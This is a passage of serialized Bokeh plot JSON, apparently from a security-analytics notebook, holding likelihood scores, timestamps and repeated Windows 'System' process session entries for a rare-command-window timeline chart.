Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"BTiHFscb1T4avl/icajlPggrcz1z6tU+HmGy0aYs8z5mX5uTglfGPvATKaOzKIM+8flCAyBMgT4gtP4jvQyWPpQsTjSJS6g+gba83xtf0D4eYbLRpizzPgy9DZbFH5g+sjn/naGRoD6OyTVfYffFPo6J1xg0gKQ+sjn/naGRoD4TbPfvaOWVPsgZ5aAA/Mo+wxMwkW7jgT7wbbYebUmXPo6J1xg0gKQ+y5Du9xKL6D4bOtwXlmp0Pm2YOt6PvNM+lCxONIlLqD5tmDrej7zTPls6CuhB05Q+yYjiK0LA4D7e+6WkNcWgPkyXBgHRZos+1OFUJwmRAT9EtFlBB07BPlcJ5lEBWjI/VwnmUQFaMj9XCeZRAVoyP1cJ5lEBWjI/HmGy0aYs8z6zx5zL/BcTP1cJ5lEBWjI/VwnmUQFaMj+zx5zL/BcTP1cJ5lEBWjI/s8ecy/wXEz9XCeZRAVoyP7PHnMv8FxM/l7etNaNACD/LkO73EovoPrCZy7ZBXxs/+1fJHTigAj8EHGo8vAT6Po2wOnlzMfk+atLYO4FXDD8EHGo8vAT6Ph5hstGmLPM+emGJGNt5DT+wmcu2QV8bP7CZy7ZBXxs/NdJ+47XI7T5FXkOOyEL+Plo+HGMAyAA/rizbnwdAAD8gjUlcwHL6PvtXyR04oAI/y5Du9xKL6D5IaE5EbuH2PsGPbln9zgo/OdnjEdeNBj9u7FwuKo3qPh5hstGmLPM+sJnLtkFfGz8kOm2CmnQOP+ZBeh8VIfw+rvlet3stAz9ybnzOzNrzPu0eXs/m0Ao/y5Du9xKL6D5XZ9EogvX6Po0hWfSgEA0/NdJ+47XI7T7Bc1cDsR8GPy9b0qRC+g8/7R5ez+bQCj9q0tg7gVcMP8uQ7vcSi+g+GXTbySjIAT+uLNufB0AAP0VeQ47IQv4+Ib8lAM6N/z5aPhxjAMgAP+8XZE/F6PY+HmGy0aYs8z6uLNufB0AAP/tXyR04oAI/cm58zsza8z6wmcu2QV8bP2rS2DuBVww/AMlvzEgZ9z56YYkY23kNP7N7gQET5wk/7xdkT8Xo9j7Lz0/OALDxPsuQ7vcSi+g+2TJU8N1XED+uLNufB0AAP8uQ7vcSi+g+RV5DjshC/j4ehh/ukl3wPgaWG1eZtvs+sJnLtkFfGz/7V8kdOKACPx5hstGmLPM+NdJ+47XI7T6wmcu2QV8bP3cr3TewCQs/HCt7T6/6Az8mUw+ekCf5PiCNSVzAcvo+djJg0zaqGD92MmDTNqoYP3YyYNM2qhg/djJg0zaqGD+aFlwhZkQVP5oWXCFmRBU/mhZcIWZEFT+aFlwhZkQVP3YyYNM2qhg/mhZcIWZEFT92MmDTNqoYP5oWXCFmRBU/djJg0zaqGD92MmDTNqoYP5oWXCFmRBU/mhZcIWZEFT92MmDTNqoYP3YyYNM2qhg/mhZcIWZEFT92MmDTNqoYP3YyYNM2qhg/mhZcIWZEFT+aFlwhZkQVP5oWXCFmRBU/djJg0zaqGD8ak6U4x04YP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCPxjj5GrptnI+8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD8=\",\"dtype\":\"float64\",\"shape\":[352]},\"time_col\":[\"2020-05-21 18:14:15.389000+00:00\",\"2020-05-21 19:15:15.392000+00:00\",\"2020-05-21 20:15:15.397000+00:00\",\"2020-05-21 20:52:15.398000+00:00\",\"2020-05-21 21:13:15.401000+00:00\",\"2020-05-21 22:15:15.399000+00:00\",\"2020-05-21 23:15:15.401000+00:00\",\"2020-05-22 00:15:15.414000+00:00\",\"2020-05-22 01:15:15.409000+00:00\",\"2020-05-22 02:15:15.414000+00:00\",\"2020-05-22 02:49:15.415000+00:00\",\"2020-05-22 03:15:15.415000+00:00\",\"2020-05-22 04:15:15.404000+00:00\",\"2020-05-22 05:15:15.419000+00:00\",\"2020-05-22 06:13:15.420000+00:00\",\"2020-05-22 07:15:15.420000+00:00\",\"2020-05-22 08:15:15.420000+00:00\",\"2020-05-22 09:13:15.423000+00:00\",\"2020-05-22 10:15:15.431000+00:00\",\"2020-05-22 11:15:15.432000+00:00\",\"2020-05-22 12:15:15.439000+00:00\",\"2020-05-22 13:03:15.433000+00:00\",\"2020-05-22 13:14:15.441000+00:00\",\"2020-05-22 14:15:15.434000+00:00\",\"2020-05-22 15:15:15.439000+00:00\",\"2020-05-22 16:15:15.443000+00:00\",\"2020-05-22 17:14:15.454000+00:00\",\"2020-05-22 17:53:15.446000+00:00\",\"2020-05-22 18:15:15.456000+00:00\",\"2020-05-22 19:15:15.452000+00:00\",\"2020-05-22 23:25:00.020000+00:00\",\"2020-05-23 01:01:00.020000+00:00\",\"2020-05-23 01:34:00.018000+00:00\",\"2020-05-23 02:34:00.030000+00:00\",\"2020-05-23 03:34:00.030000+00:00\",\"2020-05-23 04:34:00.030000+00:00\",\"2020-05-23 05:23:00.040000+00:00\",\"2020-05-23 05:34:00.035000+00:00\",\"2020-05-23 06:34:00.035000+00:00\",\"2020-05-23 07:34:00.040000+00:00\",\"2020-05-23 08:34:00.045000+00:00\",\"2020-05-23 09:34:00.050000+00:00\",\"2020-05-23 10:34:00.047000+00:00\",\"2020-05-23 11:34:00.050000+00:00\",\"2020-05-23 12:34:00.055000+00:00\",\"2020-05-23 13:01:00.053000+00:00\",\"2020-05-23 13:20:00.055000+00:00\",\"2020-05-23 13:34:00.056000+00:00\",\"2020-05-23 14:34:00.056000+00:00\",\"2020-05-23 15:34:00.061000+00:00\",\"2020-05-23 16:34:00.064000+00:00\",\"2020-05-23 17:34:00.072000+00:00\",\"2020-05-23 18:34:00.075000+00:00\",\"2020-05-23 18:56:00.070000+00:00\",\"2020-05-23 19:34:00.072000+00:00\",\"2020-05-23 20:34:00.080000+00:00\",\"2020-05-23 21:34:00.080000+00:00\",\"2020-05-23 22:34:00.080000+00:00\",\"2020-05-23 23:34:00.085000+00:00\",\"2020-05-24 00:34:00.085000+00:00\",\"2020-05-24 01:34:00.085000+00:00\",\"2020-05-24 02:34:00.089000+00:00\",\"2020-05-24 03:34:00.095000+00:00\",\"2020-05-24 03:37:00.116000+00:00\",\"2020-05-24 04:34:00.096000+00:00\",\"2020-05-24 05:34:00.107000+00:00\",\"2020-05-24 06:34:00.105000+00:00\",\"2020-05-24 07:34:00.105000+00:00\",\"2020-05-24 07:44:00.105000+00:00\",\"2020-05-24 08:34:00.104000+00:00\",\"2020-05-24 09:34:00.110000+00:00\",\"2020-05-24 10:34:00.110000+00:00\",\"2020-05-24 11:34:00.115000+00:00\",\"2020-05-24 12:34:00.120000+00:00\",\"2020-05-24 13:34:00.120000+00:00\",\"2020-05-24 14:05:00.125000+00:00\",\"2020-05-24 14:34:00.126000+00:00\",\"2020-05-24 15:34:00.125000+00:00\",\"2020-05-24 16:34:00.130000+00:00\",\"2020-05-24 17:34:00.134000+00:00\",\"2020-05-24 18:34:00.132000+00:00\",\"2020-05-24 19:34:00.133000+00:00\",\"2020-05-24 20:34:00.138000+00:00\",\"2020-05-24 20:49:00.142000+00:00\",\"2020-05-24 21:34:00.139000+00:00\",\"2020-05-24 22:34:00.141000+00:00\",\"2020-05-24 23:34:00.145000+00:00\",\"2020-05-25 00:34:00.146000+00:00\",\"2020-05-25 01:34:00.153000+00:00\",\"2020-05-25 02:34:00.151000+00:00\",\"2020-05-25 03:01:00.156000+00:00\",\"2020-05-25 03:34:00.155000+00:00\",\"2020-05-25 04:34:00.165000+00:00\",\"2020-05-25 05:34:00.160000+00:00\",\"2020-05-25 06:34:00.161000+00:00\",\"2020-05-25 07:34:00.163000+00:00\",\"2020-05-25 08:34:00.170000+00:00\",\"2020-05-25 09:34:00.169000+00:00\",\"2020-05-25 10:34:00.174000+00:00\",\"2020-05-25 11:34:00.174000+00:00\",\"2020-05-25 12:34:00.180000+00:00\",\"2020-05-25 12:52:00.181000+00:00\",\"2020-05-25 13:34:00.185000+00:00\",\"2020-05-25 14:34:00.185000+00:00\",\"2020-05-25 14:38:00.185000+00:00\",\"2020-05-25 15:34:00.185000+00:00\",\"2020-05-25 16:34:00.191000+00:00\",\"2020-05-25 17:34:00.192000+00:00\",\"2020-05-25 18:34:00.199000+00:00\",\"2020-05-25 19:34:00.202000+00:00\",\"2020-05-25 20:29:00.204000+00:00\",\"2020-05-25 20:34:00.210000+00:00\",\"2020-05-25 21:34:00.203000+00:00\",\"2020-05-25 22:34:00.206000+00:00\",\"2020-05-25 23:34:00.218000+00:00\",\"2020-05-26 00:34:00.214000+00:00\",\"2020-05-26 01:34:00.221000+00:00\",\"2020-05-21 18:31:11.271000+00:00\",\"2020-05-21 19:31:11.310000+00:00\",\"2020-05-21 20:31:11.339000+00:00\",\"2020-05-21 21:31:11.373000+00:00\",\"2020-05-21 22:31:11.411000+00:00\",\"2020-05-21 23:31:11.452000+00:00\",\"2020-05-22 00:31:11.477000+00:00\",\"2020-05-22 01:31:11.517000+00:00\",\"2020-05-22 02:31:11.555000+00:00\",\"2020-05-22 03:31:11.583000+00:00\",\"2020-05-22 04:31:11.620000+00:00\",\"2020-05-22 05:31:11.660000+00:00\",\"2020-05-22 06:31:11.700000+00:00\",\"2020-05-22 07:31:11.727000+00:00\",\"2020-05-22 08:31:11.767000+00:00\",\"2020-05-22 09:31:11.800000+00:00\",\"2020-05-22 10:31:11.833000+00:00\",\"2020-05-22 11:31:11.870000+00:00\",\"2020-05-22 12:31:11.908000+00:00\",\"2020-05-22 13:31:11.958000+00:00\",\"2020-05-22 14:31:11.982000+00:00\",\"2020-05-22 15:31:12.021000+00:00\",\"2020-05-22 16:31:12.046000+00:00\",\"2020-05-22 17:31:12.089000+00:00\",\"2020-05-22 18:31:12.126000+00:00\",\"2020-05-28 07:30:32.903000+00:00\",\"2020-05-21 18:31:11.271000+00:00\",\"2020-05-21 19:31:11.310000+00:00\",\"2020-05-21 20:31:11.339000+00:00\",\"2020-05-21 21:31:11.373000+00:00\",\"2020-05-21 22:31:11.411000+00:00\",\"2020-05-21 23:31:11.452000+00:00\",\"2020-05-22 00:31:11.477000+00:00\",\"2020-05-22 01:31:11.517000+00:00\",\"2020-05-22 02:31:11.555000+00:00\",\"2020-05-22 03:31:11.583000+00:00\",\"2020-05-22 04:31:11.620000+00:00\",\"2020-05-22 05:31:11.660000+00:00\",\"2020-05-22 06:31:11.700000+00:00\",\"2020-05-22 07:31:11.727000+00:00\",\"2020-05-22 08:31:11.767000+00:00\",\"2020-05-22 09:31:11.800000+00:00\",\"2020-05-22 10:31:11.833000+00:00\",\"2020-05-22 11:31:11.870000+00:00\",\"2020-05-22 12:31:11.908000+00:00\",\"2020-05-22 13:31:11.958000+00:00\",\"2020-05-22 14:31:11.982000+00:00\",\"2020-05-22 15:31:12.021000+00:00\",\"2020-05-22 16:31:12.046000+00:00\",\"2020-05-22 17:31:12.089000+00:00\",\"2020-05-22 18:31:12.126000+00:00\",\"2020-05-22 19:31:12.151000+00:00\",\"2020-05-22 20:31:12.196000+00:00\",\"2020-05-22 21:31:12.223000+00:00\",\"2020-05-22 22:31:12.269000+00:00\",\"2020-05-22 23:31:12.295000+00:00\",\"2020-05-23 00:31:12.338000+00:00\",\"2020-05-23 01:31:12.371000+00:00\",\"2020-05-23 02:31:12.415000+00:00\",\"2020-05-23 03:31:12.446000+00:00\",\"2020-05-23 04:31:12.483000+00:00\",\"2020-05-23 05:31:12.519000+00:00\",\"2020-05-23 06:31:12.559000+00:00\",\"2020-05-23 07:31:12.587000+00:00\",\"2020-05-23 08:31:12.629000+00:00\",\"2020-05-23 09:31:12.665000+00:00\",\"2020-05-23 10:31:12.701000+00:00\",\"2020-05-23 11:31:12.739000+00:00\",\"2020-05-23 12:31:12.765000+00:00\",\"2020-05-23 13:31:12.807000+00:00\",\"2020-05-23 14:31:12.844000+00:00\",\"2020-05-23 15:31:12.886000+00:00\",\"2020-05-23 16:31:12.928000+00:00\",\"2020-05-23 17:31:12.955000+00:00\",\"2020-05-23 18:31:12.987000+00:00\",\"2020-05-23 19:31:13.024000+00:00\",\"2020-05-23 20:31:13.059000+00:00\",\"2020-05-23 21:31:13.096000+00:00\",\"2020-05-23 22:31:13.127000+00:00\",\"2020-05-23 23:31:13.171000+00:00\",\"2020-05-24 00:31:13.214000+00:00\",\"2020-05-24 01:31:13.250000+00:00\",\"2020-05-24 02:31:13.281000+00:00\",\"2020-05-24 03:31:13.320000+00:00\",\"2020-05-24 04:31:13.359000+00:00\",\"2020-05-24 05:31:13.393000+00:00\",\"2020-05-24 06:31:13.427000+00:00\",\"2020-05-24 07:31:13.466000+00:00\",\"2020-05-24 08:31:13.494000+00:00\",\"2020-05-24 09:31:13.533000+00:00\",\"2020-05-24 10:31:13.575000+00:00\",\"2020-05-24 11:31:13.606000+00:00\",\"2020-05-24 12:31:13.647000+00:00\",\"2020-05-24 13:31:13.678000+00:00\",\"2020-05-24 14:31:13.714000+00:00\",\"2020-05-24 15:31:13.752000+00:00\",\"2020-05-24 16:31:13.789000+00:00\",\"2020-05-24 17:31:13.826000+00:00\",\"2020-05-24 18:31:13.863000+00:00\",\"2020-05-24 19:31:13.902000+00:00\",\"2020-05-24 20:31:13.933000+00:00\",\"2020-05-24 21:31:13.969000+00:00\",\"2020-05-24 22:31:14.011000+00:00\",\"2020-05-24 23:31:14.037000+00:00\",\"2020-05-25 00:31:14.079000+00:00\",\"2020-05-25 01:31:14.115000+00:00\",\"2020-05-25 02:31:14.150000+00:00\",\"2020-05-25 03:31:14.185000+00:00\",\"2020-05-25 04:31:14.224000+00:00\",\"2020-05-25 05:31:14.259000+00:00\",\"2020-05-25 06:31:14.297000+00:00\",\"2020-05-25 07:31:14.336000+00:00\",\"2020-05-25 08:31:14.360000+00:00\",\"2020-05-25 09:31:14.409000+00:00\",\"2020-05-25 10:31:14.431000+00:00\",\"2020-05-25 11:31:14.478000+00:00\",\"2020-05-25 12:31:14.505000+00:00\",\"2020-05-25 13:31:14.540000+00:00\",\"2020-05-25 14:31:14.579000+00:00\",\"2020-05-25 15:31:14.622000+00:00\",\"2020-05-25 16:31:14.660000+00:00\",\"2020-05-25 17:31:14.698000+00:00\",\"2020-05-25 18:31:14.728000+00:00\",\"2020-05-25 19:31:14.770000+00:00\",\"2020-05-25 20:31:14.803000+00:00\",\"2020-05-25 21:31:14.836000+00:00\",\"2020-05-25 22:31:14.871000+00:00\",\"2020-05-25 23:31:14.907000+00:00\",\"2020-05-26 00:31:14.949000+00:00\",\"2020-05-26 01:31:14.975000+00:00\",\"2020-05-26 02:31:15.017000+00:00\",\"2020-05-26 03:31:15.056000+00:00\",\"2020-05-26 04:31:15.089000+00:00\",\"2020-05-26 05:31:15.132000+00:00\",\"2020-05-26 06:31:15.158000+00:00\",\"2020-05-26 07:31:15.194000+00:00\",\"2020-05-26 08:31:15.237000+00:00\",\"2020-05-26 09:31:15.270000+00:00\",\"2020-05-26 10:31:15.305000+00:00\",\"2020-05-26 11:31:15.342000+00:00\",\"2020-05-26 12:31:15.377000+00:00\",\"2020-05-26 13:31:15.413000+00:00\",\"2020-05-26 14:31:15.448000+00:00\",\"2020-05-26 15:31:15.486000+00:00\",\"2020-05-26 16:31:15.522000+00:00\",\"2020-05-26 17:31:15.561000+00:00\",\"2020-05-26 18:31:15.596000+00:00\",\"2020-05-26 19:31:15.630000+00:00\",\"2020-05-26 20:31:15.676000+00:00\",\"2020-05-26 21:31:15.704000+00:00\",\"2020-05-26 22:31:15.740000+00:00\",\"2020-05-26 23:31:15.783000+00:00\",\"2020-05-27 00:31:15.816000+00:00\",\"2020-05-27 01:31:15.857000+00:00\",\"2020-05-27 02:31:15.886000+00:00\",\"2020-05-27 03:31:15.923000+00:00\",\"2020-05-27 04:31:15.959000+00:00\",\"2020-05-27 05:31:15.993000+00:00\",\"2020-05-27 06:31:16.029000+00:00\",\"2020-05-27 07:31:16.069000+00:00\",\"2020-05-27 08:31:16.104000+00:00\",\"2020-05-27 09:31:16.139000+00:00\",\"2020-05-27 10:31:16.172000+00:00\",\"2020-05-27 11:31:16.219000+00:00\",\"2020-05-27 12:31:16.248000+00:00\",\"2020-05-27 13:31:16.288000+00:00\",\"2020-05-27 14:31:16.319000+00:00\",\"2020-05-27 15:31:16.355000+00:00\",\"2020-05-27 16:31:16.396000+00:00\",\"2020-05-27 17:31:16.430000+00:00\",\"2020-05-27 18:31:16.465000+00:00\",\"2020-05-27 19:31:16.508000+00:00\",\"2020-05-27 20:31:16.541000+00:00\",\"2020-05-27 21:31:16.580000+00:00\",\"2020-05-27 22:31:16.619000+00:00\",\"2020-05-27 23:31:16.656000+00:00\",\"2020-05-28 00:31:16.692000+00:00\",\"2020-05-28 01:31:16.719000+00:00\",\"2020-05-28 02:31:16.763000+00:00\",\"2020-05-28 03:31:16.803000+00:00\",\"2020-05-28 04:31:16.838000+00:00\",\"2020-05-28 05:31:16.866000+00:00\",\"2020-05-28 06:31:16.903000+00:00\",\"2020-05-28 07:31:16.940000+00:00\",\"2020-05-28 08:31:16.974000+00:00\",\"2020-05-28 09:31:17.010000+00:00\",\"2020-05-28 10:31:17.049000+00:00\",\"2020-05-28 11:31:17.083000+00:00\",\"2020-05-28 12:31:17.121000+00:00\",\"2020-05-28 13:31:17.162000+00:00\",\"2020-05-28 14:31:17.195000+00:00\",\"2020-05-28 15:31:17.244000+00:00\",\"2020-05-28 16:31:17.270000+00:00\",\"2020-05-28 17:31:17.312000+00:00\",\"2020-05-26 06:00:06.813000+00:00\",\"2020-05-21 18:31:11.271000+00:00\",\"2020-05-21 19:31:11.310000+00:00\",\"2020-05-21 20:31:11.339000+00:00\",\"2020-05-21 21:31:11.373000+00:00\",\"2020-05-21 22:31:11.411000+00:00\",\"2020-05-21 23:31:11.452000+00:00\",\"2020-05-22 00:31:11.477000+00:00\",\"2020-05-22 01:31:11.517000+00:00\",\"2020-05-22 02:31:11.555000+00:00\",\"2020-05-22 03:31:11.583000+00:00\",\"2020-05-22 04:31:11.620000+00:00\",\"2020-05-22 05:31:11.660000+00:00\",\"2020-05-22 06:31:11.700000+00:00\",\"2020-05-22 07:31:11.727000+00:00\",\"2020-05-22 08:31:11.767000+00:00\",\"2020-05-22 09:31:11.800000+00:00\",\"2020-05-22 10:31:11.833000+00:00\",\"2020-05-22 11:31:11.870000+00:00\",\"2020-05-22 12:31:11.908000+00:00\",\"2020-05-22 13:31:11.958000+00:00\",\"2020-05-22 14:31:11.982000+00:00\",\"2020-05-22 15:31:12.021000+00:00\",\"2020-05-22 16:31:12.046000+00:00\",\"2020-05-22 17:31:12.089000+00:00\",\"2020-05-22 18:31:12.126000+00:00\",\"2020-05-22 19:30:48.734000+00:00\",\"2020-05-22 20:30:45.192000+00:00\",\"2020-05-22 21:30:45.369000+00:00\",\"2020-05-22 22:30:45.560000+00:00\",\"2020-05-22 23:30:45.750000+00:00\",\"2020-05-23 00:30:45.910000+00:00\",\"2020-05-23 01:30:46.111000+00:00\",\"2020-05-23 02:30:46.268000+00:00\",\"2020-05-23 03:30:46.448000+00:00\",\"2020-05-23 04:30:46.618000+00:00\",\"2020-05-23 05:30:46.805000+00:00\",\"2020-05-23 06:30:46.982000+00:00\",\"2020-05-23 07:30:47.162000+00:00\",\"2020-05-23 08:30:47.350000+00:00\",\"2020-05-23 09:31:12.665000+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2407\"},\"selection_policy\":{\"id\":\"2408\"}},\"id\":\"2362\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"2391\",\"type\":\"YearsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2322\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"overlay\":{\"id\":\"2369\"},\"x_range\":{\"id\":\"2306\"},\"y_range\":null},\"id\":\"2368\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"2407\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2325\",\"type\":\"SaveTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2389\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2408\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"2324\",\"type\":\"ResetTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2326\",\"type\":\"PanTool\"},{\"attributes\":{\"source\":{\"id\":\"2362\"}},\"id\":\"2367\",\"type\":\"CDSView\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"2302\"},{\"id\":\"2322\"},{\"id\":\"2323\"},{\"id\":\"2324\"},{\"id\":\"2325\"},{\"id\":\"2326\"}]},\"id\":\"2328\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2378\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"formatter\":{\"id\":\"2360\"},\"ticker\":{\"id\":\"2355\"}},\"id\":\"2354\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"2369\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"rarest_window3_likelihood\",\"@rarest_window3_likelihood\"],[\"UserId\",\"@UserId\"],[\"rarest_window3\",\"@rarest_window3\"],[\"time_col\",\"@time_col\"],[\"Computer\",\"@Computer\"]]},\"id\":\"2302\",\"type\":\"HoverTool\"},{\"attributes\":{\"axis\":{\"id\":\"2354\"},\"ticker\":null},\"id\":\"2357\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2392\",\"type\":\"Selection\"},{\"attributes\":{\"below\":[{\"id\":\"2354\"},{\"id\":\"2359\"}],\"center\":[{\"id\":\"2357\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"2366\"}],\"title\":{\"id\":\"2344\"},\"toolbar\":{\"id\":\"2358\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"2346\"},\"x_scale\":{\"id\":\"2350\"},\"y_range\":{\"id\":\"2348\"},\"y_scale\":{\"id\":\"2352\"}},\"id\":\"2343\",\"subtype\":\"Figure\",\"type\":\"Plot\"}